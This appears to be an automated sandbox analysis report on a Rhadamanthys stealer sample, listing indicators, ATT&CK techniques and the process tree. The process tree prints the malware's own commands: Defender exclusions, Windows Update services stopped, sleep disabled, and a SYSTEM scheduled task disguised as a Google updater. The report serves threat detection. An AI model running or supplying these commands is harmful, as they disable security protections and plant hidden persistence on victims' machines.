rhadamanthys | d850df618ed03fd518cb4c52bb09657a2eda865702a0498b965b0279ea73b362

Virtualization/Sandbox Evasion

Processes:

BrowserUpdate.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BrowserUpdate.exe

Drops file in Drivers directory 2 IoCs

Processes:

yI9VA7c46.exe(b_y84O.exe

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	yI9VA7c46.exe
File created	C:\Windows\System32\drivers\etc\hosts	(b_y84O.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

BrowserUpdate.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BrowserUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BrowserUpdate.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

BrowserUpdate.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Control Panel\International\Geo\Nation	BrowserUpdate.exe

Deletes itself 1 IoCs

Processes:

certreq.exe

pid	Process
332	certreq.exe

Executes dropped EXE 5 IoCs

Processes:

4vXB.exeBrowserUpdate.exeyI9VA7c46.exe(b_y84O.exeupdater.exe

pid	Process
1268	4vXB.exe
592	BrowserUpdate.exe
1636	yI9VA7c46.exe
1556	(b_y84O.exe
1592	updater.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

BrowserUpdate.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Wine	BrowserUpdate.exe

Loads dropped DLL 4 IoCs

Processes:

4vXB.exetaskeng.exe

pid	Process
1268	4vXB.exe
1052
1052
1048	taskeng.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

certreq.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

4vXB.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	4vXB.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google LLC = "C:\\Program Files\\Google\\Chrome\\Application\\BrowserUpdate.exe -l [email protected]"	4vXB.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 5 IoCs

Processes:

powershell.exesc.exepowershell.execmd.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	sc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

BrowserUpdate.exe

pid	Process
592	BrowserUpdate.exe

Drops file in Program Files directory 3 IoCs

Processes:

4vXB.exe(b_y84O.exeyI9VA7c46.exe

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	4vXB.exe
File created	C:\Program Files\Google\Chrome\updater.exe	(b_y84O.exe
File created	C:\Program Files\Google\Chrome\updater.exe	yI9VA7c46.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
432	sc.exe
644	sc.exe
1580	sc.exe
1632	sc.exe
1660	sc.exe
832	sc.exe
1256	sc.exe
1680	sc.exe
2008	sc.exe
2004	sc.exe
332	sc.exe
944	sc.exe
1596	sc.exe
1332	sc.exe
1532	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

certreq.exe

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	certreq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	certreq.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
344	schtasks.exe
756	schtasks.exe
1096	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 202cee4bcca4d901	powershell.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

file.execertreq.exeBrowserUpdate.exeyI9VA7c46.exepowershell.exe(b_y84O.exesc.exepowershell.execmd.exeupdater.exepowershell.exe

pid	Process
2004	file.exe
2004	file.exe
2004	file.exe
2004	file.exe
332	certreq.exe
332	certreq.exe
332	certreq.exe
332	certreq.exe
592	BrowserUpdate.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1796	powershell.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1332	sc.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1308	powershell.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1276	cmd.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1592	updater.exe
1592	updater.exe
2032	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exesc.exepowershell.exeupdater.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1332	sc.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeShutdownPrivilege	1592	updater.exe
Token: SeShutdownPrivilege	1656	powercfg.exe
Token: SeShutdownPrivilege	1336	powercfg.exe
Token: SeDebugPrivilege	1276	cmd.exe
Token: SeShutdownPrivilege	432	powercfg.exe
Token: SeShutdownPrivilege	1448	powercfg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	1632	powercfg.exe
Token: SeShutdownPrivilege	1576	powercfg.exe
Token: SeDebugPrivilege	2032	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

BrowserUpdate.exe

pid	Process
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exe4vXB.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1436 wrote to memory of 432	1436	cmd.exe	65
PID 1436 wrote to memory of 432	1436	cmd.exe	65
PID 1436 wrote to memory of 432	1436	cmd.exe	65
PID 1436 wrote to memory of 644	1436	cmd.exe	43
PID 1436 wrote to memory of 644	1436	cmd.exe	43
PID 1436 wrote to memory of 644	1436	cmd.exe	43
PID 1436 wrote to memory of 1580	1436	cmd.exe	44
PID 1436 wrote to memory of 1580	1436	cmd.exe	44
PID 1436 wrote to memory of 1580	1436	cmd.exe	44
PID 1128 wrote to memory of 1632	1128	cmd.exe	70
PID 1128 wrote to memory of 1632	1128	cmd.exe	70
PID 1128 wrote to memory of 1632	1128	cmd.exe	70
PID 1436 wrote to memory of 1256	1436	cmd.exe	47
PID 1436 wrote to memory of 1256	1436	cmd.exe	47
PID 1436 wrote to memory of 1256	1436	cmd.exe	47
PID 1128 wrote to memory of 944	1128	cmd.exe	49
PID 1128 wrote to memory of 944	1128	cmd.exe	49
PID 1128 wrote to memory of 944	1128	cmd.exe	49
PID 1128 wrote to memory of 2008	1128	cmd.exe	81
PID 1128 wrote to memory of 2008	1128	cmd.exe	81
PID 1128 wrote to memory of 2008	1128	cmd.exe	81
PID 1436 wrote to memory of 1680	1436	cmd.exe	89
PID 1436 wrote to memory of 1680	1436	cmd.exe	89
PID 1436 wrote to memory of 1680	1436	cmd.exe	89
PID 1128 wrote to memory of 2004	1128	cmd.exe	51
PID 1128 wrote to memory of 2004	1128	cmd.exe	51
PID 1128 wrote to memory of 2004	1128	cmd.exe	51
PID 1128 wrote to memory of 1596	1128	cmd.exe	53
PID 1128 wrote to memory of 1596	1128	cmd.exe	53
PID 1128 wrote to memory of 1596	1128	cmd.exe	53
PID 900 wrote to memory of 1592	900	cmd.exe	77
PID 900 wrote to memory of 1592	900	cmd.exe	77
PID 900 wrote to memory of 1592	900	cmd.exe	77
PID 1904 wrote to memory of 1656	1904	cmd.exe	61
PID 1904 wrote to memory of 1656	1904	cmd.exe	61
PID 1904 wrote to memory of 1656	1904	cmd.exe	61
PID 900 wrote to memory of 1336	900	cmd.exe	62
PID 900 wrote to memory of 1336	900	cmd.exe	62
PID 900 wrote to memory of 1336	900	cmd.exe	62
PID 1904 wrote to memory of 432	1904	cmd.exe	65
PID 1904 wrote to memory of 432	1904	cmd.exe	65
PID 1904 wrote to memory of 432	1904	cmd.exe	65
PID 1904 wrote to memory of 1136	1904	cmd.exe	67
PID 1904 wrote to memory of 1136	1904	cmd.exe	67
PID 1904 wrote to memory of 1136	1904	cmd.exe	67
PID 900 wrote to memory of 1448	900	cmd.exe	66
PID 900 wrote to memory of 1448	900	cmd.exe	66
PID 900 wrote to memory of 1448	900	cmd.exe	66
PID 1276 wrote to memory of 344	1276	cmd.exe	68
PID 1276 wrote to memory of 344	1276	cmd.exe	68
PID 1276 wrote to memory of 344	1276	cmd.exe	68

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

certreq.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe

outlook_win_path 1 IoCs

Processes:

certreq.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1200
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2004
- C:\Windows\system32\certreq.exe
  "C:\Windows\system32\certreq.exe"
  2⤵
  - Deletes itself
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - outlook_office_path
  - outlook_win_path
  PID:332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1332
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:432
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:644
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1580
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1256
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1680
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:944
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2008
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2004
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zmjvgdgm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:756
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:900
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1592
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjciy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1276
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:344
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1856
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:528
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1660
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:332
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Drops file in System32 directory
    - Launches sc.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1532
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:832
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1980
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1604
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zmjvgdgm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1528
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1096
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1788
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:992
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1256

C:\Users\Admin\AppData\Local\Microsoft\4vXB.exe
"C:\Users\Admin\AppData\Local\Microsoft\4vXB.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
  "C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe" -l [email protected]
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:592

C:\Users\Admin\AppData\Local\Microsoft\yI9VA7c46.exe
"C:\Users\Admin\AppData\Local\Microsoft\yI9VA7c46.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Users\Admin\AppData\Local\Microsoft\(b_y84O.exe
"C:\Users\Admin\AppData\Local\Microsoft\(b_y84O.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1556

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:1632

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\system32\taskeng.exe
taskeng.exe {2CBC4CFB-AE66-469E-AC85-F573DEDD9856} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1048
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2071785887-1226335026-934456637-1032687295934737698-2003114986377765491013590629"
1⤵
PID:2008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1108598211-160475057013085022451936920636-295928186-218446816949602026-551825290"
1⤵
PID:1680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion